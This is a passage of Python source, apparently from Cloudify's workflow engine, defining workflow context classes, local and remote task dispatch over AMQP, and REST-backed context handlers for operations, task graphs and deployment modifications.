get_relationship(self, target_id):\n \"\"\"Get a node relationship by its target id\"\"\"\n return self._relationships.get(target_id)\n\n\nclass _WorkflowContextBase(object):\n\n def __init__(self, ctx, remote_ctx_handler_cls):\n self._context = ctx = ctx or {}\n self._local_task_thread_pool_size = ctx.get(\n 'local_task_thread_pool_size',\n DEFAULT_LOCAL_TASK_THREAD_POOL_SIZE)\n self._task_retry_interval = ctx.get('task_retry_interval',\n DEFAULT_RETRY_INTERVAL)\n self._task_retries = ctx.get('task_retries',\n DEFAULT_TOTAL_RETRIES)\n self._subgraph_retries = ctx.get('subgraph_retries',\n DEFAULT_SUBGRAPH_TOTAL_RETRIES)\n self._logger = None\n\n if self.local:\n storage = ctx.pop('storage')\n handler = LocalCloudifyWorkflowContextHandler(self, storage)\n else:\n handler = remote_ctx_handler_cls(self)\n\n self._internal = CloudifyWorkflowContextInternal(self, handler)\n # is this execution being resumed? set to True if at the beginning\n # of handling the execution, the status was already STARTED\n self.resume = False\n\n def graph_mode(self):\n \"\"\"\n Switch the workflow context into graph mode\n\n :return: A task dependency graph instance\n \"\"\"\n if self.internal.task_graph.tasks:\n raise RuntimeError('Cannot switch to graph mode when tasks have '\n 'already been executed')\n\n self.internal.graph_mode = True\n return self.internal.task_graph\n\n @property\n def bootstrap_context(self):\n return self.internal._bootstrap_context\n\n @property\n def internal(self):\n return self._internal\n\n @property\n def execution_id(self):\n \"\"\"The execution id\"\"\"\n return self._context.get('execution_id')\n\n @property\n def workflow_id(self):\n \"\"\"The workflow id\"\"\"\n return self._context.get('workflow_id')\n\n @property\n def rest_token(self):\n \"\"\"REST service token\"\"\"\n return self._context.get('rest_token')\n\n @property\n def rest_host(self):\n return self._context.get('rest_host')\n\n @property\n def execution_token(self):\n \"\"\"The token of the current execution\"\"\"\n return self._context.get('execution_token')\n\n @property\n def bypass_maintenance(self):\n \"\"\"If true, all requests sent bypass maintenance mode.\"\"\"\n return self._context.get('bypass_maintenance', False)\n\n @property\n def tenant_name(self):\n \"\"\"Cloudify tenant name\"\"\"\n return self.tenant.get('name')\n\n @property\n def local(self):\n \"\"\"Is the workflow running in a local or remote context\"\"\"\n return self._context.get('local', False)\n\n @property\n def dry_run(self):\n return self._context.get('dry_run', False)\n\n @property\n def wait_after_fail(self):\n return self._context.get('wait_after_fail', 600)\n\n @property\n def logger(self):\n \"\"\"A logger for this workflow\"\"\"\n if self._logger is None:\n self._logger = self._init_cloudify_logger()\n return self._logger\n\n @property\n def tenant(self):\n \"\"\"Cloudify tenant\"\"\"\n return self._context.get('tenant', {})\n\n @property\n def execution_creator_username(self):\n return self._context.get('execution_creator_username')\n\n def _init_cloudify_logger(self):\n logger_name = self.execution_id\n logging_handler = self.internal.handler.get_context_logging_handler()\n return init_cloudify_logger(logging_handler, logger_name)\n\n def download_resource(self, resource_path, target_path=None):\n \"\"\"Downloads a blueprint/deployment resource to target_path.\n\n This mirrors ctx.download_resource, but for workflow contexts.\n See CloudifyContext.download_resource.\n \"\"\"\n return self._internal.handler.download_deployment_resource(\n resource_path=resource_path,\n target_path=target_path)\n\n def send_event(self, event, event_type='workflow_stage',\n args=None,\n additional_context=None):\n \"\"\"\n Sends a workflow event to RabbitMQ\n\n :param event: The event\n :param event_type: The event type\n :param args: additional arguments that may be added to the message\n :param additional_context: additional context to be added to the\n context\n \"\"\"\n\n send_event_task = _SendWorkflowEventTask(\n event, event_type, args, additional_context)\n return self.local_task(\n local_task=send_event_task,\n info=event)\n\n def _execute_operation(self,\n operation,\n node_instance,\n operations,\n related_node_instance=None,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n kwargs = kwargs or {}\n op_struct = operations.get(operation)\n if op_struct is None:\n raise RuntimeError('{0} operation of node instance {1} does '\n 'not exist'.format(operation,\n node_instance.id))\n if not op_struct['operation']:\n return NOPLocalWorkflowTask(self)\n plugin_name = op_struct['plugin']\n # could match two plugins with different executors, one is enough\n # for our purposes (extract package details)\n plugin = [p for p in node_instance.node.plugins\n if p['name'] == plugin_name][0]\n operation_mapping = op_struct['operation']\n has_intrinsic_functions = op_struct['has_intrinsic_functions']\n operation_properties = op_struct.get('inputs', {})\n operation_executor = op_struct['executor']\n operation_total_retries = op_struct['max_retries']\n operation_retry_interval = op_struct['retry_interval']\n operation_timeout = op_struct.get('timeout', None)\n operation_timeout_recoverable = op_struct.get('timeout_recoverable',\n None)\n task_name = operation_mapping\n if operation_total_retries is None:\n total_retries = self.internal.get_task_configuration()[\n 'total_retries']\n else:\n total_retries = operation_total_retries\n\n if plugin and plugin['package_name'] and not self.local:\n client = get_rest_client()\n filter_plugin = {'package_name': plugin.get('package_name'),\n 'package_version': plugin.get('package_version')}\n managed_plugins = client.plugins.list(**filter_plugin)\n if managed_plugins:\n plugin['visibility'] = managed_plugins[0]['visibility']\n plugin['tenant_name'] = managed_plugins[0]['tenant_name']\n\n node_context = {\n 'node_id': node_instance.id,\n 'node_name': node_instance.node_id,\n 'plugin': {\n 'name': plugin_name,\n 'package_name': plugin.get('package_name'),\n 'package_version': plugin.get('package_version'),\n 'visibility': plugin.get('visibility'),\n 'tenant_name': plugin.get('tenant_name'),\n 'source': plugin.get('source')\n },\n 'operation': {\n 'name': operation,\n 'retry_number': 0,\n 'max_retries': total_retries\n },\n 'has_intrinsic_functions': has_intrinsic_functions,\n 'host_id': node_instance._node_instance.host_id,\n 'executor': operation_executor\n }\n # central deployment agents run on the management worker\n # so we pass the env to the dispatcher so it will be on a per\n # operation basis\n if operation_executor == 'central_deployment_agent':\n agent_context = self.bootstrap_context.get('cloudify_agent', {})\n node_context['execution_env'] = agent_context.get('env', {})\n\n if related_node_instance is not None:\n relationships = [rel.target_id\n for rel in node_instance.relationships]\n node_context['related'] = {\n 'node_id': related_node_instance.id,\n 'node_name': related_node_instance.node_id,\n 'is_target': related_node_instance.id in relationships\n }\n\n final_kwargs = self._merge_dicts(merged_from=kwargs,\n merged_into=operation_properties,\n allow_override=allow_kwargs_override)\n\n return self.execute_task(\n task_name,\n local=self.local,\n kwargs=final_kwargs,\n node_context=node_context,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=operation_retry_interval,\n timeout=operation_timeout,\n timeout_recoverable=operation_timeout_recoverable)\n\n @staticmethod\n def _merge_dicts(merged_from, merged_into, allow_override=False):\n result = copy.copy(merged_into)\n for key, value in merged_from.items():\n if not allow_override and key in merged_into:\n raise RuntimeError('Duplicate definition of {0} in operation'\n ' properties and in kwargs. To allow '\n 'redefinition, pass '\n '\"allow_kwargs_override\" to '\n '\"execute_operation\"'.format(key))\n result[key] = value\n return result\n\n def update_execution_status(self, new_status):\n \"\"\"\n Updates the execution status to new_status.\n Note that the workflow status gets automatically updated before and\n after its run (whether the run succeeded or failed)\n \"\"\"\n update_execution_status_task = _UpdateExecutionStatusTask(new_status)\n\n return self.local_task(\n local_task=update_execution_status_task,\n info=new_status)\n\n def _build_cloudify_context(self,\n task_id,\n task_name,\n node_context,\n timeout,\n timeout_recoverable):\n node_context = node_context or {}\n context = {\n '__cloudify_context': '0.3',\n 'type': 'operation',\n 'task_id': task_id,\n 'task_name': task_name,\n 'execution_id': self.execution_id,\n 'workflow_id': self.workflow_id,\n 'tenant': self.tenant,\n 'timeout': timeout,\n 'timeout_recoverable': timeout_recoverable\n }\n context.update(node_context)\n context.update(self.internal.handler.operation_cloudify_context)\n return context\n\n def execute_task(self,\n task_name,\n local=True,\n task_queue=None,\n task_target=None,\n kwargs=None,\n node_context=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n total_retries=None,\n retry_interval=None,\n timeout=None,\n timeout_recoverable=None):\n \"\"\"\n Execute a task\n\n :param task_name: the task named\n :param kwargs: optional kwargs to be passed to the task\n :param node_context: Used internally by node.execute_operation\n \"\"\"\n # Should deepcopy cause problems here, remove it, but please make\n # sure that WORKFLOWS_WORKER_PAYLOAD is not global in manager repo\n kwargs = copy.deepcopy(kwargs) or {}\n task_id = str(uuid.uuid4())\n cloudify_context = self._build_cloudify_context(\n task_id,\n task_name,\n node_context,\n timeout,\n timeout_recoverable)\n kwargs['__cloudify_context'] = cloudify_context\n\n if self.dry_run:\n return DryRunLocalWorkflowTask(\n local_task=lambda: None,\n workflow_context=self,\n name=task_name,\n kwargs=kwargs\n )\n\n if local:\n # oh sweet circular dependency\n from cloudify import dispatch\n return self.local_task(local_task=dispatch.dispatch,\n info=task_name,\n name=task_name,\n kwargs=kwargs,\n task_id=task_id,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=retry_interval)\n else:\n return self.remote_task(task_queue=task_queue,\n task_target=task_target,\n kwargs=kwargs,\n cloudify_context=cloudify_context,\n task_id=task_id,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=retry_interval)\n\n def local_task(self,\n local_task,\n node=None,\n info=None,\n kwargs=None,\n task_id=None,\n name=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n override_task_config=False,\n total_retries=None,\n retry_interval=None):\n \"\"\"\n Create a local workflow task\n\n :param local_task: A callable implementation for the task\n :param node: A node if this task is called in a node context\n :param info: Additional info that will be accessed and included\n in log messages\n :param kwargs: kwargs to pass to the local_task when invoked\n :param task_id: The task id\n \"\"\"\n global_task_config = self.internal.get_task_configuration()\n if hasattr(local_task, 'workflow_task_config'):\n decorator_task_config = local_task.workflow_task_config\n else:\n decorator_task_config = {}\n invocation_task_config = dict(\n local_task=local_task,\n node=node,\n info=info,\n kwargs=kwargs,\n send_task_events=send_task_events,\n task_id=task_id,\n name=name)\n if total_retries is not None:\n invocation_task_config['total_retries'] = total_retries\n if retry_interval is not None:\n invocation_task_config['retry_interval'] = retry_interval\n\n final_task_config = {}\n final_task_config.update(global_task_config)\n if override_task_config:\n final_task_config.update(decorator_task_config)\n final_task_config.update(invocation_task_config)\n else:\n final_task_config.update(invocation_task_config)\n final_task_config.update(decorator_task_config)\n\n return self._process_task(LocalWorkflowTask(\n workflow_context=self,\n **final_task_config))\n\n def remote_task(self,\n kwargs,\n cloudify_context,\n task_id,\n task_queue=None,\n task_target=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n total_retries=None,\n retry_interval=None):\n \"\"\"\n Create a remote workflow task\n\n :param cloudify_context: A dict for creating the CloudifyContext\n used by the called task\n :param task_id: The task id\n \"\"\"\n task_configuration = self.internal.get_task_configuration()\n if total_retries is not None:\n task_configuration['total_retries'] = total_retries\n if retry_interval is not None:\n task_configuration['retry_interval'] = retry_interval\n return self._process_task(\n RemoteWorkflowTask(kwargs=kwargs,\n cloudify_context=cloudify_context,\n task_target=task_target,\n task_queue=task_queue,\n workflow_context=self,\n task_id=task_id,\n send_task_events=send_task_events,\n **task_configuration))\n\n def _process_task(self, task):\n if self.internal.graph_mode:\n return task\n else:\n self.internal.task_graph.add_task(task)\n return task.apply_async()\n\n def get_operations(self, graph_id):\n return self.internal.handler.get_operations(graph_id)\n\n def update_operation(self, operation_id, state):\n return self.internal.handler.update_operation(operation_id, state)\n\n def get_tasks_graph(self, name):\n return self.internal.handler.get_tasks_graph(self.execution_id, name)\n\n def store_tasks_graph(self, name, operations=None):\n return self.internal.handler.store_tasks_graph(\n self.execution_id, name, operations=operations)\n\n def store_operation(self, task, dependencies, graph_id):\n return self.internal.handler.store_operation(\n graph_id=graph_id, dependencies=dependencies, **task.dump())\n\n def remove_operation(self, operation_id):\n return self.internal.handler.remove_operation(operation_id)\n\n def get_execution(self, execution_id=None):\n \"\"\"\n Ge the execution object for the current execution\n :param execution_id: The Id of the execution object\n :return: Instance of `Execution` object which holds all the needed info\n \"\"\"\n if not execution_id:\n execution_id = self.execution_id\n return self.internal.handler.get_execution(execution_id)\n\n\nclass WorkflowNodesAndInstancesContainer(object):\n\n def __init__(self, workflow_context, raw_nodes, raw_node_instances):\n self._nodes = dict(\n (node.id, CloudifyWorkflowNode(workflow_context, node, self))\n for node in raw_nodes)\n\n self._node_instances = dict(\n (instance.id, CloudifyWorkflowNodeInstance(\n workflow_context, self._nodes[instance.node_id], instance,\n self))\n for instance in raw_node_instances)\n\n for inst in self._node_instances.values():\n for rel in inst.relationships:\n if rel.relationship.is_derived_from(\n \"cloudify.relationships.contained_in\"):\n rel.target_node_instance._add_contained_node_instance(inst)\n\n @property\n def nodes(self):\n return iter(self._nodes.values())\n\n @property\n def node_instances(self):\n return iter(self._node_instances.values())\n\n def get_node(self, node_id):\n \"\"\"\n Get a node by its id\n\n :param node_id: The node id\n :return: a CloudifyWorkflowNode instance for the node or None if\n not found\n \"\"\"\n return self._nodes.get(node_id)\n\n def get_node_instance(self, node_instance_id):\n \"\"\"\n Get a node instance by its id\n\n :param node_instance_id: The node instance id\n :return: a CloudifyWorkflowNode instance for the node or None if\n not found\n \"\"\"\n return self._node_instances.get(node_instance_id)\n\n def refresh_node_instances(self):\n if self.local:\n storage = self.internal.handler.storage\n raw_node_instances = storage.get_node_instances()\n else:\n rest = get_rest_client()\n raw_node_instances = rest.node_instances.list(\n deployment_id=self.deployment.id,\n _get_all_results=True)\n self._node_instances = dict(\n (instance.id, CloudifyWorkflowNodeInstance(\n self, self._nodes[instance.node_id], instance,\n self))\n for instance in raw_node_instances)\n\n\nclass CloudifyWorkflowContext(\n _WorkflowContextBase,\n WorkflowNodesAndInstancesContainer\n):\n \"\"\"\n A context used in workflow operations\n\n :param ctx: a cloudify_context workflow dict\n \"\"\"\n\n def __init__(self, ctx):\n with current_workflow_ctx.push(self):\n # Not using super() here, because\n # WorkflowNodesAndInstancesContainer's __init__() needs some data\n # to be prepared before calling it. It would be possible to\n # overcome this by using kwargs + super(...).__init__() in\n # _WorkflowContextBase, but the way it is now is self-explanatory.\n _WorkflowContextBase.__init__(self, ctx,\n RemoteCloudifyWorkflowContextHandler)\n self.blueprint = context.BlueprintContext(self._context)\n self.deployment = WorkflowDeploymentContext(self._context, self)\n\n if self.local:\n storage = self.internal.handler.storage\n raw_nodes = storage.get_nodes()\n raw_node_instances = storage.get_node_instances()\n else:\n rest = get_rest_client()\n raw_nodes = rest.nodes.list(\n deployment_id=self.deployment.id,\n _get_all_results=True,\n evaluate_functions=self.deployment.runtime_only_evaluation)\n raw_node_instances = rest.node_instances.list(\n deployment_id=self.deployment.id,\n _get_all_results=True)\n\n WorkflowNodesAndInstancesContainer.__init__(self, self, raw_nodes,\n raw_node_instances)\n\n def _build_cloudify_context(self, *args):\n context = super(\n CloudifyWorkflowContext,\n self\n )._build_cloudify_context(*args)\n context.update({\n 'blueprint_id': self.blueprint.id,\n 'deployment_id': self.deployment.id\n })\n return context\n\n\nclass CloudifySystemWideWorkflowContext(_WorkflowContextBase):\n\n def __init__(self, ctx):\n with current_workflow_ctx.push(self):\n super(CloudifySystemWideWorkflowContext, self).__init__(\n ctx,\n SystemWideWfRemoteContextHandler\n )\n self._dep_contexts = None\n\n class _ManagedCloudifyWorkflowContext(CloudifyWorkflowContext):\n def __enter__(self):\n self.internal.start_local_tasks_processing()\n\n def __exit__(self, *args, **kwargs):\n self.internal.stop_local_tasks_processing()\n\n @property\n def deployments_contexts(self):\n if self._dep_contexts is None:\n self._dep_contexts = {}\n\n rest = get_rest_client(tenant=self.tenant_name)\n deployments_list = rest.deployments.list(\n _include=['id', 'blueprint_id'],\n _get_all_results=True\n )\n for dep in deployments_list:\n # Failure to deepcopy will cause snapshot restore context hack\n # to be reset just before it's needed.\n dep_ctx = copy.deepcopy(self._context)\n dep_ctx['tenant']['name'] = self.tenant_name\n dep_ctx['deployment_id'] = dep.id\n dep_ctx['blueprint_id'] = dep.blueprint_id\n\n def lazily_loaded_ctx(dep_ctx):\n def lazy_ctx():\n if not hasattr(lazy_ctx, '_cached_ctx'):\n lazy_ctx._cached_ctx = \\\n self._ManagedCloudifyWorkflowContext(dep_ctx)\n return lazy_ctx._cached_ctx\n\n return proxy(lazy_ctx)\n\n self._dep_contexts[dep.id] = lazily_loaded_ctx(dep_ctx)\n return self._dep_contexts\n\n\nclass CloudifyWorkflowContextInternal(object):\n\n def __init__(self, workflow_context, handler):\n self.workflow_context = workflow_context\n self.handler = handler\n self._bootstrap_context = None\n self._graph_mode = False\n # the graph is always created internally for events to work properly\n # when graph mode is turned on this instance is returned to the user.\n subgraph_task_config = self.get_subgraph_task_configuration()\n self._task_graph = TaskDependencyGraph(\n workflow_context=workflow_context,\n default_subgraph_task_config=subgraph_task_config)\n\n # local task processing\n thread_pool_size = self.workflow_context._local_task_thread_pool_size\n self.local_tasks_processor = LocalTasksProcessing(\n self.workflow_context,\n thread_pool_size=thread_pool_size)\n\n def get_task_configuration(self):\n bootstrap_context = self._get_bootstrap_context()\n workflows = bootstrap_context.get('workflows', {})\n total_retries = workflows.get(\n 'task_retries',\n self.workflow_context._task_retries)\n retry_interval = workflows.get(\n 'task_retry_interval',\n self.workflow_context._task_retry_interval)\n return dict(total_retries=total_retries,\n retry_interval=retry_interval)\n\n def get_subgraph_task_configuration(self):\n bootstrap_context = self._get_bootstrap_context()\n workflows = bootstrap_context.get('workflows', {})\n subgraph_retries = workflows.get(\n 'subgraph_retries',\n self.workflow_context._subgraph_retries\n )\n return dict(total_retries=subgraph_retries)\n\n def _get_bootstrap_context(self):\n if self._bootstrap_context is None:\n self._bootstrap_context = self.handler.bootstrap_context\n return self._bootstrap_context\n\n @property\n def task_graph(self):\n return self._task_graph\n\n @property\n def graph_mode(self):\n return self._graph_mode\n\n @graph_mode.setter\n def graph_mode(self, graph_mode):\n self._graph_mode = graph_mode\n\n def send_task_event(self, state, task, event=None):\n send_task_event_func = self.handler.get_send_task_event_func(task)\n events.send_task_event(state, task, send_task_event_func, event)\n\n def send_workflow_event(self,\n event_type,\n message=None,\n args=None,\n additional_context=None):\n self.handler.send_workflow_event(event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context)\n\n def start_local_tasks_processing(self):\n self.local_tasks_processor.start()\n\n def stop_local_tasks_processing(self):\n self.local_tasks_processor.stop()\n\n def add_local_task(self, task):\n self.local_tasks_processor.add_task(task)\n\n\nclass LocalTasksProcessing(object):\n\n def __init__(self, workflow_ctx, thread_pool_size=1):\n self._local_tasks_queue = queue.Queue()\n self._local_task_processing_pool = []\n self._is_local_context = workflow_ctx.local\n for i in range(thread_pool_size):\n name = 'Task-Processor-{0}'.format(i + 1)\n if self._is_local_context:\n thread = threading.Thread(target=self._process_local_task,\n name=name, args=(workflow_ctx, ))\n thread.daemon = True\n else:\n # this is a remote workflow, use an AMQPWrappedThread\n thread = AMQPWrappedThread(target=self._process_local_task,\n name=name, args=(workflow_ctx, ))\n self._local_task_processing_pool.append(thread)\n self.stopped = False\n\n def start(self):\n for thread in self._local_task_processing_pool:\n thread.start()\n if not self._is_local_context:\n for thread in self._local_task_processing_pool:\n thread.started_amqp_client.wait(timeout=30)\n\n def stop(self):\n self.stopped = True\n\n def add_task(self, task):\n self._local_tasks_queue.put(task)\n\n def _process_local_task(self, workflow_ctx):\n # see CFY-1442\n with current_workflow_ctx.push(workflow_ctx):\n while not self.stopped:\n try:\n task = self._local_tasks_queue.get(timeout=1)\n task()\n # may seem too general, but daemon threads are just great.\n # anyway, this is properly unit tested, so we should be good.\n except Exception:\n pass\n\n# Local/Remote Handlers\n\n\nclass CloudifyWorkflowContextHandler(object):\n\n def __init__(self, workflow_ctx):\n self.workflow_ctx = workflow_ctx\n\n def get_context_logging_handler(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_node_logging_handler(self, workflow_node_instance):\n raise NotImplementedError('Implemented by subclasses')\n\n @property\n def bootstrap_context(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_send_task_event_func(self, task):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n raise NotImplementedError('Implemented by subclasses')\n\n @property\n def operation_cloudify_context(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n raise NotImplementedError('Implemented by subclasses')\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n raise NotImplementedError('Implemented by subclasses')\n\n def start_deployment_modification(self, nodes):\n raise NotImplementedError('Implemented by subclasses')\n\n def finish_deployment_modification(self, modification):\n raise NotImplementedError('Implemented by subclasses')\n\n def rollback_deployment_modification(self, modification):\n raise NotImplementedError('Implemented by subclasses')\n\n def list_deployment_modifications(self, status):\n raise NotImplementedError('Implemented by subclasses')\n\n def scaling_groups(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_operations(self, graph_id):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_tasks_graph(self, execution_id, name):\n raise NotImplementedError('Implemented by subclasses')\n\n def update_operation(self, operation_id, state):\n raise NotImplementedError('Implemented by subclasses')\n\n def store_tasks_graph(self, execution_id, name, operations):\n raise NotImplementedError('Implemented by subclasses')\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n raise NotImplementedError('Implemented by subclasses')\n\n def remove_operation(self, operation_id):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_execution(self, execution_id):\n raise NotImplementedError('Implemented by subclasses')\n\n\nclass _TaskDispatcher(object):\n def __init__(self):\n self._tasks = {}\n self._logger = logging.getLogger('dispatch')\n\n def make_subtask(self, tenant, target, task_id, queue, kwargs):\n task = {\n 'id': task_id,\n 'tenant': tenant,\n 'target': target,\n 'queue': queue,\n 'task': {\n 'id': task_id,\n 'cloudify_task': {'kwargs': kwargs},\n }\n }\n handler = amqp_client.CallbackRequestResponseHandler(task['target'])\n client = self._get_client(task)\n client.add_handler(handler)\n task.update({\n 'client': client,\n 'handler': handler\n })\n return task\n\n def _get_client(self, task):\n if task['queue'] == MGMTWORKER_QUEUE:\n client = amqp_client.get_client()\n else:\n tenant = utils.get_tenant()\n client = amqp_client.get_client(\n amqp_user=tenant.rabbitmq_username,\n amqp_pass=tenant.rabbitmq_password,\n amqp_vhost=tenant.rabbitmq_vhost\n )\n return client\n\n def send_task(self, workflow_task, task):\n agent = task['target']\n handler = task['handler']\n if task['target'] != MGMTWORKER_QUEUE \\\n and not is_agent_alive(agent, task['client'], connect=False):\n raise exceptions.RecoverableError(\n 'Timed out waiting for agent: {0}'.format(agent))\n\n handler.publish(task['task'], routing_key='operation',\n correlation_id=task['id'])\n self._logger.debug('Task [{0}] sent'.format(task['id']))\n\n def wait_for_result(self, result, workflow_task, task):\n client, handler = task['client'], task['handler']\n callback = functools.partial(self._received, task['id'], client)\n handler.callbacks[task['id']] = callback\n self._tasks.setdefault(client, {})[task['id']] = \\\n (workflow_task, task, result)\n client.consume_in_thread()\n handler.make_response_queue(task['id'])\n return result\n\n def _set_task_state(self, workflow_task, state, event=None):\n with current_workflow_ctx.push(workflow_task.workflow_context):\n workflow_task.set_state(state)\n if event is not None:\n events.send_task_event(\n state, workflow_task,\n events.send_task_event_func_remote, event)\n\n def _received(self, task_id, client, response):\n self._logger.debug(\n '[{0}] Response received - {1}'.format(task_id, response)\n )\n try:\n if not response:\n return\n try:\n workflow_task, task, result = \\\n self._tasks[client].pop(task_id)\n except KeyError:\n return\n if workflow_task.is_terminated:\n return\n\n error = response.get('error')\n if error:\n exception = deserialize_known_exception(error)\n if isinstance(exception, exceptions.OperationRetry):\n state = TASK_RESCHEDULED\n else:\n state = TASK_FAILED\n self._set_task_state(workflow_task, state)\n result.result = exception\n else:\n state = TASK_SUCCEEDED\n self._set_task_state(workflow_task, state, {\n 'result': response.get('result')\n })\n result.result = response.get('result')\n\n self._maybe_stop_client(client)\n except Exception:\n self._logger.error('Error occurred while processing task',\n exc_info=True)\n raise\n\n def _maybe_stop_client(self, client):\n if self._tasks[client]:\n return\n self._tasks.pop(client)\n # we are running in a callback - on the consumer thread. No reason to\n # try and wait (join) for the thread we're running on to be closed\n client.close(wait=False)\n\n\nclass RemoteContextHandler(CloudifyWorkflowContextHandler):\n def __init__(self, *args, **kwargs):\n super(RemoteContextHandler, self).__init__(*args, **kwargs)\n self._dispatcher = _TaskDispatcher()\n\n @property\n def bootstrap_context(self):\n return get_bootstrap_context()\n\n def get_send_task_event_func(self, task):\n return events.send_task_event_func_remote\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n # augment cloudify context with target and queue\n tenant = tenant or workflow_task.cloudify_context.get('tenant')\n\n # Remote task\n return self._dispatcher.make_subtask(\n tenant, target, task_id=workflow_task.id,\n kwargs=workflow_task.kwargs, queue=queue)\n\n def send_task(self, workflow_task, task):\n return self._dispatcher.send_task(workflow_task, task)\n\n def wait_for_result(self, result, workflow_task, task):\n return self._dispatcher.wait_for_result(result, workflow_task, task)\n\n @property\n def operation_cloudify_context(self):\n return {'local': False,\n 'bypass_maintenance': utils.get_is_bypass_maintenance(),\n 'rest_token': utils.get_rest_token(),\n 'execution_token': utils.get_execution_token(),\n 'execution_creator_username':\n utils.get_execution_creator_username()}\n\n def download_deployment_resource(self,\n blueprint_id,\n deployment_id,\n tenant_name,\n resource_path,\n target_path=None):\n logger = self.workflow_ctx.logger\n return download_resource(blueprint_id=blueprint_id,\n deployment_id=deployment_id,\n tenant_name=tenant_name,\n resource_path=resource_path,\n target_path=target_path,\n logger=logger)\n\n def get_operations(self, graph_id):\n client = get_rest_client()\n ops = []\n offset = 0\n while True:\n operations = client.operations.list(graph_id, _offset=offset)\n ops += operations.items\n if len(ops) < operations.metadata.pagination.total:\n offset += operations.metadata.pagination.size\n else:\n break\n return ops\n\n def update_operation(self, operation_id, state):\n client = get_rest_client()\n client.operations.update(operation_id, state=state)\n\n def get_tasks_graph(self, execution_id, name):\n client = get_rest_client()\n graphs = client.tasks_graphs.list(execution_id, name)\n if graphs:\n return graphs[0]\n\n def store_tasks_graph(self, execution_id, name, operations):\n client = get_rest_client()\n return client.tasks_graphs.create(execution_id, name, operations)\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n client = get_rest_client()\n client.operations.create(\n operation_id=id,\n graph_id=graph_id,\n name=name,\n type=type,\n dependencies=dependencies,\n parameters=parameters)\n\n def remove_operation(self, operation_id):\n client = get_rest_client()\n client.operations.delete(operation_id)\n\n def get_execution(self, execution_id):\n client = get_rest_client()\n return client.executions.get(execution_id)\n\n\nclass RemoteCloudifyWorkflowContextHandler(RemoteContextHandler):\n\n _scaling_groups = None\n\n def get_node_logging_handler(self, workflow_node_instance):\n return CloudifyWorkflowNodeLoggingHandler(workflow_node_instance,\n out_func=logs.amqp_log_out)\n\n def get_context_logging_handler(self):\n return CloudifyWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.amqp_log_out)\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n return super(RemoteCloudifyWorkflowContextHandler, self) \\\n .download_deployment_resource(\n blueprint_id=self.workflow_ctx.blueprint.id,\n deployment_id=self.workflow_ctx.deployment.id,\n tenant_name=self.workflow_ctx.tenant_name,\n resource_path=resource_path,\n target_path=target_path)\n\n def start_deployment_modification(self, nodes):\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n modification = client.deployment_modifications.start(\n deployment_id=deployment_id,\n nodes=nodes,\n context={\n 'blueprint_id': self.workflow_ctx.blueprint.id,\n 'deployment_id': deployment_id,\n 'execution_id': self.workflow_ctx.execution_id,\n 'workflow_id': self.workflow_ctx.workflow_id,\n })\n return Modification(self.workflow_ctx, modification)\n\n def finish_deployment_modification(self, modification):\n client = get_rest_client()\n client.deployment_modifications.finish(modification.id)\n\n def rollback_deployment_modification(self, modification):\n client = get_rest_client()\n client.deployment_modifications.rollback(modification.id)\n\n def list_deployment_modifications(self, status):\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n modifications = client.deployment_modifications.list(\n deployment_id=deployment_id,\n status=status)\n return [Modification(self.workflow_ctx, m) for m in modifications]\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_workflow_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context,\n out_func=logs.amqp_event_out)\n\n @property\n def scaling_groups(self):\n if not self._scaling_groups:\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n deployment = client.deployments.get(\n deployment_id, _include=['scaling_groups'])\n self._scaling_groups = deployment['scaling_groups']\n return self._scaling_groups\n\n\nclass SystemWideWfRemoteContextHandler(RemoteContextHandler):\n\n def get_context_logging_handler(self):\n return SystemWideWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.amqp_log_out)\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_sys_wide_wf_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context,\n out_func=logs.amqp_event_out)\n\n\nclass LocalCloudifyWorkflowContextHandler(CloudifyWorkflowContextHandler):\n\n def __init__(self, workflow_ctx, storage):\n super(LocalCloudifyWorkflowContextHandler, self).__init__(\n workflow_ctx)\n self.storage = storage\n self._send_task_event_func = None\n\n def get_context_logging_handler(self):\n return CloudifyWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.stdout_log_out)\n\n def get_node_logging_handler(self, workflow_node_instance):\n return CloudifyWorkflowNodeLoggingHandler(workflow_node_instance,\n out_func=logs.stdout_log_out)\n\n @property\n def bootstrap_context(self):\n return {}\n\n def get_send_task_event_func(self, task):\n return events.send_task_event_func_local\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n raise NotImplementedError('Not implemented by local workflow tasks')\n\n @property\n def operation_cloudify_context(self):\n return {'local': True,\n 'storage': self.storage}\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_workflow_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context,\n 